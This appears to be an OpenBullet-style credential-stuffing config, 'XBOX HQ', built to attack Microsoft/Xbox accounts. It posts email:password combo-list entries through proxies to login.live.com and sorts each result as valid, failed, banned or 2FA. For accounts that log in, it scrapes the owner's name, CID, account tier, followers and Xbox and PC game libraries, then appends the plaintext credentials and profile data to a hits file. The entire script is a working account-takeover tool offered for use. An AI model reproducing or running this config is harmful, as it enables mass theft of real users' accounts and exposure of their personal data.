[SETTINGS]
{
  "Name": "XBOX HQ",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2020-12-04T07:03:51.1023634+04:00",
  "AdditionalInfo": "Ricking#3224",
  "Author": "Ricking#3224",
  "Version": "1.4.3 [Anomaly]",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "Contour": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#POST REQUEST POST "https://login.live.com/ppsecure/post.srf?wa=wsignin1.0&rpsnv=13&rver=7.1.6819.0&wp=MBI_SSL&wreply=https:%2f%2faccount.xbox.com%2fen-us%2faccountcreation%3freturnUrl%3dhttps:%252f%252fwww.xbox.com:443%252fen-US%252f%26ru%3dhttps:%252f%252fwww.xbox.com%252fen-US%252f%26rtc%3d1&lc=1033&id=292543&aadredir=1&contextid=C61E086B741A7BC9&bk=1573475927&uaid=e94a49f177664960a3fca122edaf8a27&pid=0" 
  CONTENT "i13=0&login=<USER>&loginfmt=<USER>&type=11&LoginOptions=3&lrt=&lrtPartition=&hisRegion=&hisScaleUnit=&passwd=<PASS>&ps=2&psRNGCDefaultType=&psRNGCEntropy=&psRNGCSLK=&canary=&ctx=&hpgrequestid=&PPFT=DZshWk88CvvuA9vSOHldJLurwIJH4a7uUREfu4fGCsbB2nL*YUw36i0Lz7tZDGptQxZhUTW0%21*ZM3oIUxGKEeEa1gcx%21XzBNiXpzf*U9iH68RaP3u20G0J6k2%21UdeMFc9C9uusE3IwI3gi4u7wJzyq8FCiNuk2Hly66dMuX96mSwHTYXgtZZpS%21rbS35jrsdC%21Ku4UysydsP0MXSz2klYp9KU%21hDHeKBZIu13h%21rQk9jG2vzCW4OerTedipQDJRuAg%24%24&PPSX=Passpor&NewUser=1&FoundMSAs=&fspost=0&i21=0&CookieDisclosure=0&IsFidoSupported=0&i2=1&i17=0&i18=&i19=32099" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "Referer: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&rver=7.1.6819.0&wp=MBI_SSL&wreply=https:%2f%2faccount.xbox.com%2fen-us%2faccountcreation%3freturnUrl%3dhttps:%252f%252fwww.xbox.com:443%252fen-US%252f%26ru%3dhttps:%252f%252fwww.xbox.com%252fen-US%252f%26rtc%3d1&lc=1033&id=292543&aadredir=1" 
  HEADER "Cookie: wlidperf=FR=L&ST=1573475967016; MSPShared=1; SDIDC=CavoGthu*pkJAN8Eek6dWr5opN5x1BL2!mueAsRqcHLVS94TF9fJG7M1fnoFg6a*recSzMqgr*rslJH2ICxiqJGNoOHcIMFXc!RLunwBMWhU0x321UT4GCRmUx6DZ7AjzurT*F2lfakG55iffb2VLqMt0mhzOabJGnTjvNhmJC9g1p*grJ8oN9vhRFP1QX!nZ!fWcW27*aTbPPnlAGv9aKLWqL*MazqS52WCQ1qeFZq2cv5ZfnxVwVkgfgjdQvs2GEwfHcnTOQx1uQdtaK9OZwguM8Ck!XoiweJLLeKfFhKRZuntwAkM7ZR0uwP6Z19dR7mBTpGpy5F6!dyrkpKizd9!nzZSFFo*7poLWKhu1rNfXZj1IGgaH9sTsatt8!OJcUye6DGBEO2UgVGMYZSXh3qZLLQfoCt27U2AyIJI2kF!CwX2SD8t9RLWxmz1S3NIVWmBO8wm!DlUH1lpURHmiXbk1m!22SzIKy09LvlGae8GFkF!Rx57Ef2CKW5i5QTBtQ$$; IgnoreCAW=1; MSCC=1571654982; mkt=en-US; optimizelyEndUserId=oeu1572238927711r0.5850160263416339; uaid=e94a49f177664960a3fca122edaf8a27; MSPRequ=id=292543&lt=1573475927&co=1; OParams=11DUe2VlF3OgbQNYrRZRg3REn8KImGd*MjJ03B0XHPylHxLr2YAXrzYNH!J96HFWgoWGEdSPWFdPiET54l8VSW7HH0FPuC0Ce2pxC2uyWUloRhCunIwMUB8QUtvNr0as9T1RluKxlaF5K4LNi7CWjITDPFW2tzU!gS5LVvUdG58wfPg1itYuqY2HKQNrXN51!s!LMD8g2Gf5pcrXZibicJLoN1z5P3XSQm2UhakTdBNoDEruwv8MWbzT!5ImiwMzPP*G5APiiLE!9EKUwPT49z1!ERSbMlpzjFZP25j3o01h!9VuAllBJeaaJeclbcH9QuCwvUd2N3Z6kCiV5jlEKbyfAbHAiIJ6TNAmwU3ftHK08Fy5L6vUHSZRyocbR18FVCoP7lMVfmfQfS41VEmD3JdZTwjJIosaE7!i7E31jx5gwDqYZpo0wjnRzQlt3I9twovyRxbRxuvMVRqN7ey0AE7XI67w70kjUoRg*NbmI2BAxmuNnAdujjs4YlLsdZ8iIIFk73CkQpQ6X!MO58xB09KYImQyevehtDlrXkr*oDQCAh; MSPOK=$uuid-6b855d49-8f09-4e83-8526-b756788bf3b9$uuid-02a3151d-ba2d-4c6c-be88-c9c804ecb043" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Failure AND 
    KEY "<SOURCE>" DoesNotContain ",AC:null,urlFedConvertRename" 
    KEY "incorrect account or password.\"," 
  KEYCHAIN Ban OR 
    KEY ",AC:null,urlFedConvertRename" 
  KEYCHAIN Failure OR 
    KEY "timed out" 
  KEYCHAIN Success OR 
    KEY "name=\"ANON\"" 
    KEY "https://account.live.com/profile/accrue?mkt=" 
  KEYCHAIN Custom "2FACTOR" OR 
    KEY "account.live.com/recover?mkt" 
    KEY "recover?mkt" 
    KEY "account.live.com/identity/confirm?mkt" 
  KEYCHAIN Custom "2FACTOR" OR 
    KEY "Email/Confirm?mkt" 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "/cancel?mkt=" 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "/Abuse?mkt=" 

#XNXX PARSE "<SOURCE>" LR "uaid=" "\"" -> VAR "XNXX" 

#Token PARSE "<SOURCE>" LR "<input type=\"hidden\" name=\"t\" id=\"t\" value=\"" "\">" -> VAR "Token" 

#KOS PARSE "<SOURCE>" LR "id=\"pprid\" value=\"" "\">" -> VAR "KOS" 

#KIRI PARSE "<SOURCE>" LR "name=\"NAP\" id=\"NAP\" value=\"" "\">" -> VAR "KIRI" 

#KIR PARSE "<SOURCE>" LR "name=\"ANON\" id=\"ANON\" value=\"" "\">" -> VAR "KIR" 

#GET1 REQUEST GET "https://login.live.com/me.srf?wa=wsignin1.0&wreply=https%3A%2F%2Fwww.xbox.com&uaid=<XNXX>&partnerId=xboxcomuhf" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8" 

#Post_IDS REQUEST POST "https://account.xbox.com/en-us/accountcreation?returnUrl=https:%2f%2fwww.xbox.com:443%2fen-US%2f&ru=https:%2f%2fwww.xbox.com%2fen-US%2f&rtc=1&wa=wsignin1.0" 
  CONTENT "pprid=<KOS>&NAP=<KIRI>&ANON=<KIR>&t=<Token>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8" 

#GET_Follower REQUEST GET "https://account.xbox.com/en-us/Profile?xr=socialtwistnav" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#Followers_Count PARSE "<SOURCE>" LR "\"FollowersCount\":" "," CreateEmpty=FALSE -> CAP "Followers Count" 

#True_Sign REQUEST GET "https://account.xbox.com/en-us/social/api/UserDataMeControl" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Success OR 
    KEY "\"IsSignedIn\":true" 

#First_Name PARSE "<SOURCE>" LR "\"FirstName\":\"" "\"" CreateEmpty=FALSE -> CAP "First Name" 

#LastName PARSE "<SOURCE>" LR "\"LastName\":\"" "\"" CreateEmpty=FALSE -> CAP "Last Name" 

#CID PARSE "<SOURCE>" LR "\"CID\":\"" "\"" CreateEmpty=FALSE -> CAP "CID" 

#Account_Tier PARSE "<SOURCE>" LR "\"AccountTier\":\"" "\"" CreateEmpty=FALSE -> CAP "Account Tier" 

#GET_X1 REQUEST GET "https://account.xbox.com/en-us/MyGames?gameType=XboxOne" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

SET VAR "XBOXGAMESRC" "<SOURCE>" TRUE

#GET_Pc REQUEST GET "https://account.xbox.com/en-us/MyGames?gameType=PC" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

SET VAR "PCGAMESRC" "<SOURCE>" TRUE

#Xbox PARSE "<XBOXGAMESRC>" REGEX "\"Heading\":\"(.*?)\",\"" "[1]" Recursive=TRUE -> VAR "XKIRI" 

#PC PARSE "<PCGAMESRC>" REGEX "\"Heading\":\"(.*?)\",\"" "[1]" Recursive=TRUE -> VAR "KONI" 

#Xbox_Games FUNCTION Replace "," " / " "<XKIRI>" -> CAP "Xbox Games" 

#R1 FUNCTION Replace "[" "" "<Xbox Games>" -> VAR "R1" 

#R2 FUNCTION Replace "]" "" "<R1>" -> VAR "R2" 

#R3 FUNCTION Replace " / " "\\n" "<R2>" -> VAR "R3" 

#R4 FUNCTION CountOccurrences "\\n" "<R3>" -> VAR "R4" 

#Nummber_Games FUNCTION Compute "<R4>+1" -> CAP "Number Of Xbox Games" 

#PC_Games FUNCTION Replace "," " / " "<KONI>" -> CAP "PC Games" 

#R10 FUNCTION Replace "[" "" "<PC Games>" -> VAR "R10" 

#R20 FUNCTION Replace "]" "" "<R10>" -> VAR "R20" 

#R30 FUNCTION Replace " / " "\\n" "<R20>" -> VAR "R30" 

#R40 FUNCTION CountOccurrences "\\n" "<R30>" -> VAR "R40" 

#Number_Of_PC_Games FUNCTION Compute "<R40>+1" -> CAP "Number Of PC Games" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "FREE" AND 
    KEY "<Xbox Games>" Contains "[]" 
    KEY "<PC Games>" Contains "[]" 

#Save UTILITY File "XBOX Hits.txt" AppendLines "<<<<<<=Account=>>>>>>\\nCombo: <USER>:<PASS>\\nEmail:  <USER>\\nPassword: <PASS>\\n<<<<<<<<<<<=Information=>>>>>>>>>>\\nFirst Name: <First Name>\\nLast Name: <Last Name>\\nFollowers Count: <Followers Count>\\nCID: <CID>\\nAccount Tier: <Account Tier>\\n<<<<<=Xbox Games=>>>>>\\nNumber Of Games: <Number Of Xbox Games>\\n[[[[[Games List]]]]]:\\n <R3>\\n\\n<<<<<<<=PC Games=>>>>>>>\\nNumber Of Games: <Number Of PC Games>\\n[[[[[Games List]]]]]\\n <R30>\\n\\n\\n Config By @YashvirGaming0388==================================================================" -> VAR "Save" 

